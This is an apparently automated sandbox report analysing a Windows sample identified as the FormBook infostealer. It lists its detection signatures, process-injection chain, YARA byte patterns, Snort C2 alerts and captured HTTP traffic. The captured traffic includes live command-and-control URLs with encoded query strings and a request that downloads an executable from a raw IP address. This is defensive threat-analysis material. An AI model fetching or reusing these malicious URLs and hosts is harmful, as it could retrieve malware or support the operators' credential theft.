Windows Analysis Report
8hd98EhtIFcYkb8.exe

Overview

General Information

Sample name:8hd98EhtIFcYkb8.exe
Analysis ID:1465534
MD5:677b2d2d3a54e0c1d8e416b276093fb3
SHA1:22b6aa9e97cf16d55aa16dcc20fea67f9806d09c
SHA256:c42f31c68ee4a14aec74ddce249314d00813289dc36740484b09ceadf72aa0f8
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 8hd98EhtIFcYkb8.exe (PID: 3588 cmdline: "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe" MD5: 677B2D2D3A54E0C1D8E416B276093FB3)
    • 8hd98EhtIFcYkb8.exe (PID: 4840 cmdline: "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe" MD5: 677B2D2D3A54E0C1D8E416B276093FB3)
      • xQUrWfQeELsQZII.exe (PID: 6768 cmdline: "C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 7640 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • xQUrWfQeELsQZII.exe (PID: 6696 cmdline: "C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • aj34fjqh.exe (PID: 6180 cmdline: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" MD5: A000A790579BE8EDD044A668469EA33E)
            • aj34fjqh.exe (PID: 7712 cmdline: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" MD5: A000A790579BE8EDD044A668469EA33E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ab20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1417f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a8c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        25.2.aj34fjqh.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          25.2.aj34fjqh.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d1d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16902:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.8hd98EhtIFcYkb8.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.8hd98EhtIFcYkb8.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x168f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              System Summary

              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe, ParentCommandLine: "C:\Windows\SysWOW64\chkntfs.exe", ParentImage: C:\Windows\SysWOW64\chkntfs.exe, ParentProcessId: 7640, ParentProcessName: chkntfs.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" , ProcessId: 6180, ProcessName: aj34fjqh.exe
              Timestamp:07/01/24-19:25:38.686378
              SID:2855465
              Source Port:64475
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:25:25.124461
              SID:2855465
              Source Port:64471
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:27:00.696487
              SID:2855465
              Source Port:64496
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:19.230746
              SID:2855465
              Source Port:64484
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:24:15.086308
              SID:2855465
              Source Port:64459
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:25:11.804732
              SID:2855465
              Source Port:64467
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:00.592496
              SID:2855465
              Source Port:64479
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:46.825321
              SID:2855465
              Source Port:64492
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:24:37.172413
              SID:2855465
              Source Port:64463
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:23:35.528269
              SID:2855465
              Source Port:49712
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/01/24-19:26:33.240207
              SID:2855465
              Source Port:64488
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              AV Detection

              Source: 8hd98EhtIFcYkb8.exeAvira: detected
              Source: http://www.foryourhealth19.com/ym7q/Avira URL Cloud: Label: malware
              Source: http://www.ridcoredry.live/blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hvAvira URL Cloud: Label: phishing
              Source: http://www.foryourhealth19.com/ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTfAvira URL Cloud: Label: malware
              Source: http://www.ridcoredry.live/blq3/Avira URL Cloud: Label: phishing
              Source: 8hd98EhtIFcYkb8.exeReversingLabs: Detection: 28%
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeJoe Sandbox ML: detected
              Source: 8hd98EhtIFcYkb8.exeJoe Sandbox ML: detected
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: XOyN.pdb source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr
              Source: Binary string: chkntfs.pdbGCTL source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357259966.000000000055E000.00000002.00000001.01000000.0000000D.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3691801922.000000000055E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: wntdll.pdbUGP source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 8hd98EhtIFcYkb8.exe, 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: chkntfs.pdb source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: XOyN.pdbSHA256 source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005ABE80 FindFirstFileW,FindNextFileW,FindClose,14_2_005ABE80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 4x nop then jmp 026E23FCh0_2_026E2698
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then xor eax, eax14_2_00599790
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then mov ebx, 00000004h14_2_045F053E

              Networking

              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49712 -> 217.160.0.31:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64459 -> 172.67.194.145:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64463 -> 38.55.194.30:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64467 -> 46.30.215.51:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64471 -> 74.208.236.162:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64475 -> 192.250.231.28:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64479 -> 162.0.238.43:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64484 -> 43.198.80.127:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64488 -> 45.130.41.249:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64492 -> 91.195.240.123:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64496 -> 38.207.19.49:80
              Source: DNS query: www.tufftiff.xyz
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 17:26:06 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 27 Jun 2024 06:51:42 GMTETag: "aaa00-61bd9903d370d"Accept-Ranges: bytesContent-Length: 698880Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
              Source: Joe Sandbox ViewIP Address: 162.0.238.43 162.0.238.43
              Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
              Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
              Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
              Source: Joe Sandbox ViewASN Name: ONECOMDK ONECOMDK
              Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: global trafficHTTP traffic detected: GET /ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcp HTTP/1.1Host: www.erhaltungsmassage.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf HTTP/1.1Host: www.foryourhealth19.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi4 HTTP/1.1Host: www.86wqi.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.vivaepicmarbella.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q+XwrjtzU7ALaZIX7Qr7xG0Tk3i+702mxinN9hpFEu+s7zPr8ql7seaWvhcu7+p+54MBjhZ2jhTmPmJLv4ka4ysGmOJ/DhiKAPXXpWbDV/sLTxWyGr8frfPdUs+6sgZH HTTP/1.1Host: www.lookstudiov.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.cr-pos.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /vwgn/?FTP84=5ueMAWSl8HCdHaQ4ISZ1AQXhc5gyPvE6M+De+X7bZoAB9UCIok5O2fARcoTif8zUuE/VgVKiECkkSJ85U3W5QFFnp/YrlC4tzeltTmpoeWoUEn2HXZmMuQrIM+LIMwiHVH8SJcx756eW&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.tufftiff.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /EuOdzX7Ehz6t1H3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.234.72.101Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /i6sl/?Lb=GFtlIrHx8T50&FTP84=qssHGV29j0ZCAjpN6QtzDw+gnCiynPmFES/c0m6mTWJ8eKXYeJPjMTEVk7GvbqhDwPeBMRZatQ3ofr/5XjUfaZC8rCPfXyoknOgmUV1BLU/3HLT18Q+LgoHdoh8bcR/ofs2EqraVghMO HTTP/1.1Host: www.botokkkd4.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.cvt-auto.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hv HTTP/1.1Host: www.ridcoredry.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /vgf2/?FTP84=F0TubYbkra/fLGHNqtnaeYyDjBSRDaIxGedz+B7Iv0bejpDurJsW0bbpyLvpmMVlmiWzO1GtHUuGPki2goMxppGKi6uI7uQ9xVSgz+G1kxpEA95r9Q5H+Hhz7gAx2pLrWkb0si+rio1X&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.filmbrute.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: unknown
              HTTP traffic detected: POST /ym7q/ HTTP/1.1
                Host: www.foryourhealth19.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Content-Length: 218
                Cache-Control: max-age=0
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.foryourhealth19.com
                Referer: http://www.foryourhealth19.com/ym7q/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 601
                Connection: close
                Date: Mon, 01 Jul 2024 17:23:36 GMT
                Server: Apache
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:24:08 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cache-Control: no-cache, no-store, must-revalidate
                Expires: Mon, 01 Jul 2024 17:24:08 GMT
                Vary: Accept-Encoding
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Bymy%2F47YGKLuptjPc%2FFtTMCiL0eKvE%2FXL5LAyiNqSylVIdQ75P1qZj%2Fn2%2FuMx8L%2FyZakR5RNjWL1ayG5NGMsnmZuQ13AszDw2N3jmPLkeVcQZ2wVqFf5dq%2B%2BOjOTFjxateKfBbP5zEklg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89c8167d49c43342-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:24:10 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cache-Control: no-cache, no-store, must-revalidate
                Expires: Mon, 01 Jul 2024 17:24:10 GMT
                Vary: Accept-Encoding
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwCJnTv%2BJ2biJChg1%2FB6iIHYzJ348OvD9GWQ1GQCOOGCaZ6dMPc5i%2FbooNLIBx4Dp%2BDBT%2FWK1fCZhWkEGZUG9Y4bzJ2TxVjW41YdaqQMaVpqB69hi4z0d2R2hvV%2FwfDVPZ%2FnV5IalID3xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89c8168d9de61861-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:24:13 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cache-Control: no-cache, no-store, must-revalidate
                Expires: Mon, 01 Jul 2024 17:24:13 GMT
                Vary: Accept-Encoding
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUWgQue1Wm10I2%2FTLrJbffBvm2P1%2BOCfmfZZKEyzgoWO4hPpLK5uA%2BIYJkt1N2U3McWZDjvv0r4VKG6i8MOVXYKa%2Br1KQn4HjtRUducmDTMxTD791UEuQFAvqRe4Ke%2BweDYlIMIsdElXUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89c8169d1c67c323-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 01 Jul 2024 17:24:15 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cache-Control: no-cache, no-store, must-revalidate
                Expires: Mon, 01 Jul 2024 17:24:15 GMT
                Vary: Accept-Encoding
                CF-Cache-Status: DYNAMIC
